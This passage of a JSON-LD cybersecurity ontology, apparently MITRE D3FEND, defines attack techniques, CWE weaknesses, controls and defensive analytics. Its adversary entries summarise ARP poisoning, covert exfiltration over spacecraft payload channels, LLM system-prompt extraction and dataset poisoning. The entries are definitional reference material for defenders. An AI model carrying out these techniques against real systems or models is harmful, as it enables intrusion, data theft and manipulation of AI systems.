          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N7f121f2bc4e0400abc752409e01edca0"
        }
      ]
    },
    {
      "@id": "_:N7f121f2bc4e0400abc752409e01edca0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AllocateMemory"
      }
    },
    {
      "@id": "d3f:T1019",
      "@type": "owl:Class",
      "d3f:attack-id": "T1019",
      "d3f:definition": "The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1542.001",
      "rdfs:label": "System Firmware",
      "rdfs:seeAlso": {
        "@id": "d3f:T1542.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:NetworkAudioStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital audio media content to users.",
      "rdfs:label": "Network Audio Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMediaStreamingResource"
      }
    },
    {
      "@id": "d3f:T1593.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593.001",
      "d3f:definition": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.",
      "rdfs:label": "Social Media",
      "rdfs:subClassOf": {
        "@id": "d3f:T1593"
      }
    },
    {
      "@id": "d3f:T1422.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1422.001",
      "d3f:definition": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using `adb shell netstat` for Android.(Citation: adb_commands)",
      "rdfs:label": "Internet Connection Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1422"
      },
      "skos:prefLabel": "Internet Connection Discovery"
    },
    {
      "@id": "d3f:RD-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0004",
      "d3f:definition": "Before execution, adversaries prepare the ground, literally and figuratively. They upload tooling, exploits, procedures, and datasets to infrastructure they own or have compromised, wire up C2 and telemetry pipelines, and pre-configure RF/baseband chains and protocol stacks to match mission parameters. Staging often uses cloud object stores, VPS fleets, or CI/CD runners masquerading as benign automation; artifacts are containerized or signed with hijacked material to blend in. For RF operations, actors assemble demod/encode flowgraphs, precompute CRC/MAC fields and timetags, and script rate/size pacing to fit pass windows. For ground/cloud, they stage credentials, macros, and schedule templates that can push changes or exfiltrate data quickly during handovers or safing. Dry-runs on flatsats/HIL rigs validate timing and error paths; OPSEC measures (rotating domains, domain fronting, traffic mixers) reduce attribution.",
      "rdfs:label": "Stage Capabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Stage Capabilities"
    },
    {
      "@id": "d3f:OTConnectionCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Establish a network connection with a device.",
      "rdfs:label": "OT Connection Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTNetworkManagementCommandEvent"
        },
        {
          "@id": "_:N1fd3af844b3f4c5c90766dcb14fcfc76"
        },
        {
          "@id": "_:N7fa6e3cb9cb8490ca4264eece3cbaf57"
        }
      ]
    },
    {
      "@id": "_:N1fd3af844b3f4c5c90766dcb14fcfc76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:N7fa6e3cb9cb8490ca4264eece3cbaf57",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTConnectionCommand"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3_10",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Malicious Code Protection | Malicious Code Analysis",
      "d3f:exactly": {
        "@id": "d3f:DynamicAnalysis"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-3(10)"
    },
    {
      "@id": "d3f:CWE-481",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-481",
      "d3f:definition": "The code uses an operator for assignment when the intention was to perform a comparison.",
      "rdfs:label": "Assigning instead of Comparing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-480"
      }
    },
    {
      "@id": "d3f:AML.T0069",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069",
      "d3f:definition": "The adversary is trying to discover something about the large language model's (LLM) system information. This may be found in a configuration file containing the system instructions or extracted via interactions with the LLM. The desired information may include the full system prompt, special characters that have significance to the LLM or keywords indicating functionality available to the LLM. Information about how the LLM is instructed can be used by the adversary to understand the system's capabilities and to aid them in crafting malicious prompts.",
      "rdfs:label": "Discover LLM System Information - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover LLM System Information"
    },
    {
      "@id": "d3f:ATTACKICSDiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0102"
      },
      "rdfs:label": "Discovery Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N5476ecdcbd384347a0914c929ef073b7"
        }
      ],
      "skos:prefLabel": "Discovery Technique"
    },
    {
      "@id": "_:N5476ecdcbd384347a0914c929ef073b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0102"
      }
    },
    {
      "@id": "d3f:SoftwareTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A timer implemented in software, typically managed by the operating system or application code. Software timers rely on underlying hardware timers or clocks to measure intervals and trigger actions. They are used for scheduling tasks, implementing timeouts, and managing periodic operations within software environments.",
      "d3f:implemented-by": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Timer",
      "rdfs:seeAlso": {
        "@id": "https://docs.aws.amazon.com/freertos/latest/userguide/software-timers.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Timer"
        },
        {
          "@id": "_:N6f49eb871f89458cbb0f9ceccd8d66ba"
        }
      ]
    },
    {
      "@id": "_:N6f49eb871f89458cbb0f9ceccd8d66ba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:WindowsNtSuspendProcess",
      "@type": "owl:Class",
      "rdfs:label": "Windows NtSuspendProcess",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendProcess"
      }
    },
    {
      "@id": "d3f:Reference-DHS-CCTV-Technology-Handbook",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dhs.gov/sites/default/files/publications/CCTV-Tech-HBK_0713-508.pdf"
      },
      "d3f:kb-abstract": "A publicly available handbook describing CCTV technologies, components, and considerations for deployment.",
      "d3f:kb-author": "U.S. Department of Homeland Security",
      "d3f:kb-reference-of": {
        "@id": "d3f:VideoSurveillance"
      },
      "d3f:kb-reference-title": "CCTV Technology Handbook",
      "rdfs:label": "Reference - DHS CCTV Technology Handbook"
    },
    {
      "@id": "d3f:UnsupervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-UL",
      "d3f:definition": "Unsupervised learning creates relationships with unlabeled data without the input of a human or other outside actor. Uses only input data. ",
      "d3f:kb-abstract": "## References\nUnsupervised learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Unsupervised_learning).",
      "rdfs:label": "Unsupervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:CWE-553",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-553",
      "d3f:definition": "A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.",
      "rdfs:label": "Command Shell in Externally Accessible Directory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:manages",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x manages y: The technique or agent x watches and directs the use of digital artifact y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02447914-v"
      },
      "rdfs:label": "manages",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": [
        "oversees",
        "supervises"
      ]
    },
    {
      "@id": "d3f:CWE-1230",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1230",
      "d3f:definition": "The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information.",
      "rdfs:label": "Exposure of Sensitive Information Through Metadata",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:AML.T0010.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.002",
      "d3f:definition": "Data is a key vector of supply chain compromise for adversaries.\nEvery AI project will require some form of data.\nMany rely on large open source datasets that are publicly available.\nAn adversary could rely on compromising these sources of data.\nThe malicious data could be a result of [Poison Training Data](/techniques/AML.T0020) or include traditional malware.\n\nAn adversary can also target private datasets in the labeling phase.\nThe creation of private datasets will often require the hiring of outside labeling services.\nAn adversary can poison a dataset by modifying the labels being generated by the labeling service.",
      "rdfs:label": "Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Data"
    },
    {
      "@id": "d3f:OTDeviceConfigurationCommand",
      "@type": "owl:Class",
      "d3f:definition": "Configure or administer managed devices.",
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: READ PROGRAM MEMORY\nGE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: SET PLC (RUN VS STOP)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY"
      ],
      "rdfs:label": "OT Device Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeRedBalloon",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10657262B1/en"
      },
      "d3f:kb-abstract": "Systems and methods for securing embedded devices via both online and offline defensive strategies. One or more security software components may be injected into firmware binary to create a modified firmware binary, which is functionally- and size-equivalent to the original firmware binary. The security software components may retrieve live forensic information related to embedded devices for use in live hardening of the modified firmware binary while the embedded device is online, dynamically patching the firmware",
      "d3f:kb-author": "Ang Cui, Salvatore J. Stolfo",
      "d3f:kb-organization": "Red Balloon Security, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareEmbeddedMonitoringCode"
      },
      "d3f:kb-reference-title": "Method and apparatus for securing embedded device firmware",
      "rdfs:label": "Reference - Firmware Embedded Monitoring Code Red Balloon"
    },
    {
      "@id": "d3f:InstantMessagingClient",
      "@type": "owl:Class",
      "d3f:definition": "Client software used to engage in Instant Messaging, a type of online chat that offers real-time text transmission over the Internet. A LAN messenger operates in a similar way over a local area network. Short messages are typically transmitted between two parties, when each user chooses to complete a thought and select \"send\". Some IM applications can use push technology to provide real-time text, which transmits messages character by character, as they are composed. More advanced instant messaging can add file transfer, clickable hyperlinks, Voice over IP, or video chat.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/wiki/Instant_messaging"
      },
      "rdfs:label": "Instant Messaging Client",
      "rdfs:subClassOf": {
        "@id": "d3f:CollaborativeSoftware"
      }
    },
    {
      "@id": "d3f:CCI-001083_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the presentation of information system management-related functionality at an interface for non-privileged users.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001083"
    },
    {
      "@id": "d3f:CWE-352",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-352",
      "d3f:definition": "The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.",
      "d3f:synonym": [
        "CSRF",
        "Cross Site Reference Forgery",
        "Session Riding",
        "XSRF"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Cross-Site Request Forgery (CSRF)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-345"
        },
        {
          "@id": "_:N928153bd137646f3bd58c9c03b89ea5a"
        }
      ]
    },
    {
      "@id": "_:N928153bd137646f3bd58c9c03b89ea5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:DeepQ-learning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DQL",
      "d3f:definition": "Uses a deep convolutional neural network, with layers of tiled convolutional filters to mimic the effects of receptive fields.",
      "d3f:kb-article": "## References\nQ-learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Q-learning#Deep_Q-learning).",
      "rdfs:label": "Deep Q-learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Q-Learning"
      }
    },
    {
      "@id": "d3f:PackageURL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A package URL, or purl, is a URL used to identify a software package in a mostly universal and uniform way across programming languages, package managers, packaging conventions, tools, APIs and databases.",
      "d3f:identifies": {
        "@id": "d3f:SoftwarePackage"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://github.com/package-url/purl-spec/blob/main/PURL-SPECIFICATION.rst"
      },
      "rdfs:label": "Package URL",
      "rdfs:seeAlso": {
        "@id": "https://github.com/package-url/purl-spec"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:URL"
        },
        {
          "@id": "_:N1ab3b0ddbc594a2086b1786662d6cb40"
        }
      ],
      "skos:altLabel": "purl"
    },
    {
      "@id": "_:N1ab3b0ddbc594a2086b1786662d6cb40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwarePackage"
      }
    },
    {
      "@id": "d3f:attack-id",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x attack-id y: The offensive technique x has the ATT&CK unique id of y.",
      "rdfs:domain": {
        "@id": "d3f:OffensiveTechnique"
      },
      "rdfs:label": "attack-id",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-kb-annotation"
      }
    },
    {
      "@id": "d3f:RecurrentNeuralNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RNN",
      "d3f:definition": "Recurrent Neural Networks (RNN) are a class of artificial neural networks where connections between nodes can create a cycle, allowing output from some nodes to affect subsequent input to the same nodes. This allows it to exhibit temporal dynamic behavior.",
      "d3f:kb-article": "## References\nWikipedia. (2021, September 7). Recurrent Neural Network. [Link](https://en.wikipedia.org/wiki/Recurrent_neural_network)",
      "rdfs:label": "Recurrent Neural Network",
      "rdfs:subClassOf": {
        "@id": "d3f:DeepNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:CWE-1426",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1426",
      "d3f:definition": "The product invokes a generative AI/ML component whose behaviors and outputs cannot be directly controlled, but the product does not validate or insufficiently validates the outputs to ensure that they align with the intended security, content, or privacy policy.",
      "rdfs:label": "Improper Validation of Generative AI Output",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:DNSTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSTrafficAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-DNSTA",
      "d3f:definition": "Analysis of domain name metadata, including name and DNS records, to determine whether the domain is likely to resolve to an undesirable host.",
      "d3f:kb-article": "## How it works\nThis technique can be accomplished in a number of ways.\n\n* One example analytic determines whether or not a domain name was generated with an algorithm. Domain generation algorithms (DGAs) are sometimes used to create a domain name automatically that will resolve to C2 infrastructure, without directly coding the domains in question into the malicious code.\n* Another method analyzes information about domains that have been visited, including whether a domain name is longer than a common length, if a dynamic DNS domain was visited, if a fast-flux domain was visited, and if a recently created domain was visited. These factors are used to develop a score and if that score is over a certain threshold, an alert is generated.\n* Collected malware samples can be executed in a virtual environment to identify network domains that are connected to during execution. The network domains are then generated into signatures to identify bad domains for other hosts.\n\nThis technique does not check for content hosted at the domain.\n\n## Considerations\n\n* DNS produces a large amount of traffic which can be resource-intensive to analyze in real time.\n* If a server is compromised, for example, as part of a watering hole attack, but the DNS information pointing to that server is not altered, this technique would not catch such an incident.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DomainAgeRegistrationAlert_IncRapid7IncRAPID7Inc"
        },
        {
          "@id": "d3f:Reference-HeuristicBotnetDetection_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingAlgorithm-generatedDomains_VECTRANETWORKSInc"
        },
        {
          "@id": "d3f:Reference-PredictingDomainGenerationAlgorithmsWithLongShort-TermMemoryNetworks_"
        },
        {
          "@id": "d3f:Reference-SinkholingBadNetworkDomainsByRegisteringTheBadNetworkDomainsOnTheInternet_PaloAltoNetworksInc"
        }
      ],
      "d3f:may-contain": {
        "@id": "d3f:DNSLookup"
      },
      "d3f:synonym": "Domain Name Analysis",
      "rdfs:label": "DNS Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N0b86ccfd50f243c78cab5d28b6331055"
        },
        {
          "@id": "_:Nd9eaea0b20794744b7f3959e839a53c2"
        }
      ]
    },
    {
      "@id": "_:N0b86ccfd50f243c78cab5d28b6331055",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "_:Nd9eaea0b20794744b7f3959e839a53c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:UserProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user process is a process running to perform functions in the name of one particular user and user account, such as running an application or an application service serving any number of users. This is in contrast to a system process, which executes software to fulfill operating system functions.",
      "rdfs:label": "User Process",
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-1096",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1096",
      "d3f:definition": "The product implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once.",
      "rdfs:label": "Singleton Class Instance Creation without Proper Locking or Synchronization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-820"
      }
    },
    {
      "@id": "d3f:CWE-154",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-154",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as variable name delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Variable Name Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:Higher-orderLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HOL",
      "d3f:definition": "Higher-order logic is a form of predicate logic that is distinguished from first-order logic by additional quantifiers and, sometimes, stronger semantics. Higher-order logics with their standard semantics are more expressive, but their model-theoretic properties are less well-behaved than those of first-order logic.",
      "d3f:kb-article": "## References\n1. Higher-order logic. (2023, May 13). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Higher-order_logic)",
      "d3f:synonym": "HOL",
      "rdfs:label": "Higher-order Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:PredicateLogic"
      }
    },
    {
      "@id": "d3f:PatternMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PM",
      "d3f:definition": "Pattern matching is the act of checking a given sequence of tokens for the presence of the constituents of some pattern.",
      "d3f:kb-article": "## References\n1. Pattern matching. (2023, May 20). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Pattern_matching)",
      "rdfs:label": "Pattern Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalRules"
      }
    },
    {
      "@id": "d3f:T1557.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1557.002",
      "d3f:definition": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).",
      "rdfs:label": "ARP Cache Poisoning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1557"
      }
    },
    {
      "@id": "d3f:Reference-SystemsAndMethodsForDetectingCredentialTheft_SymantecCorp",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10162962B1"
      },
      "d3f:kb-abstract": "The disclosed computer-implemented method for detecting credential theft may include (i) monitoring a secured computing system's credential store that may include at least one sensitive credential that may be used to facilitate authentication of a user that is attempting to access the secured computing system, (ii) gathering, while monitoring the credential store, primary evidence of an attempted theft of the sensitive credential from the credential store, (iii) gathering corroborating evidence of the attempted theft of the sensitive credential, and (iv) performing a security action in response to gathering the primary evidence and the corroborating evidence of the attempted theft. The primary evidence of the attempted theft of the sensitive credential may include evidence of any suspicious access of the sensitive credential from the credential store that occurs outside of a procedure of authenticating the user. Various other methods, systems, and computer-readable media are also disclosed.",
      "d3f:kb-author": "Adam Glick; Brian Schlatter; Feng Li; Akshata Krishnamoorthy Rao",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Symantec Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialCompromiseScopeAnalysis"
      },
      "d3f:kb-reference-title": "Systems and methods for detecting credential theft",
      "rdfs:label": "Reference - Systems and methods for detecting credential theft - Symantec Corp"
    },
    {
      "@id": "d3f:T1580",
      "@type": "owl:Class",
      "d3f:attack-id": "T1580",
      "d3f:definition": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.",
      "rdfs:label": "Cloud Infrastructure Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:SupportVectorMachineClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SVMC",
      "d3f:definition": "Support Vector Machine (SVM) is a robust classification and regression technique that maximizes the predictive accuracy of a model without overfitting the training data. SVM is particularly suited to analyzing data with very large numbers (for example, thousands) of predictor fields.",
      "d3f:kb-article": "## References\nAbout Support Vector Machine (SVM). IBM SPSS Modeler SaaS Documentation. [Link](https://www.ibm.com/docs/en/spss-modeler/saas?topic=models-about-svm&mhsrc=ibmsearch_a&mhq=support%20vector%20machine).",
      "rdfs:label": "Support Vector Machine Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:EXF-0010",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0010",
      "d3f:definition": "Many payloads maintain communications separate from the primary TT&C, direct downlinks to user terminals, customer networks, or experimenter VPNs. An adversary who implants code in the payload (or controls its gateway) can route host-bus data into these channels, embed content within payload products (e.g., steganographic fields in imagery/telemetry), or schedule covert file transfers alongside legitimate deliveries. Because these paths are expected to carry high-rate mission data and may bypass TT&C monitoring, they provide a discreet conduit to exfiltrate payload or broader spacecraft information without altering the primary command link’s profile.",
      "rdfs:label": "Payload Communication Channel - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0010/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Payload Communication Channel"
    },
    {
      "@id": "d3f:T1078.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.003",
      "d3f:definition": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.",
      "d3f:uses": {
        "@id": "d3f:LocalUserAccount"
      },
      "rdfs:label": "Local Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:N92e50e35af7f41038c4e009c3acd4f75"
        }
      ]
    },
    {
      "@id": "_:N92e50e35af7f41038c4e009c3acd4f75",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:ATLASLateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0015"
      },
      "rdfs:label": "Lateral Movement Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N6fe9c76cd209422bba4d5694377e3e08"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:N6fe9c76cd209422bba4d5694377e3e08",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0015"
      }
    },
    {
      "@id": "d3f:IA-0004.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0004.01",
      "d3f:definition": "Threat actors may target the backup ground segment, standby MOC sites, alternate commercial stations, or contingency chains held in reserve. Threat actors establish presence on the backup path (operator accounts, scheduler/orchestration, modem profiles, antenna control) and then exploit moments when operations shift: planned exercises, maintenance at the primary site, weather diversions, or failover during anomalies. They may also shape conditions so traffic is re-routed, e.g., by saturating the primary’s RF front end or consuming its schedules, without revealing their involvement. Once on the backup, prepositioned procedures, macros, or configuration sets allow command injection, manipulation of pass timelines, or quiet collection of downlink telemetry.",
      "rdfs:label": "Ground Station - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0004/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0004"
      },
      "skos:prefLabel": "Ground Station"
    },
    {
      "@id": "d3f:BERT",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BER",
      "d3f:definition": "Bidirectional Encoder Representations from Transformers (BERT) is based on a deep learning model in which every output element is connected to every input element, and the weightings between them are dynamically calculated based upon their connection.",
      "d3f:kb-article": "## References\nBERT (language model). (n.d.). In TechTarget. [Link](https://www.techtarget.com/searchenterpriseai/definition/BERT-language-model)\nBERT (language model). (n.d.). In Wikipedia. [Link](https://en.wikipedia.org/wiki/BERT_(language_model))",
      "d3f:synonym": "Bidirectional Encoder Representations from Transformers",
      "rdfs:label": "BERT",
      "rdfs:subClassOf": {
